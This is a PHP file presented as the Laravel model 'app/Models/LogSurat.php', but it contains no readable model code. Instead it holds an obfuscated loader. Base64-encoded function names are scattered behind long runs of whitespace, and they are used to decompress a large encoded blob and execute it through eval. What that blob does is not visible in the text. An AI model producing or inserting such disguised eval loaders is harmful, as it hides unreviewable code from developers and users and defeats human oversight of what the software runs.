<?php 
        $__='printf';$_='Loading app/Models/LogSurat.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
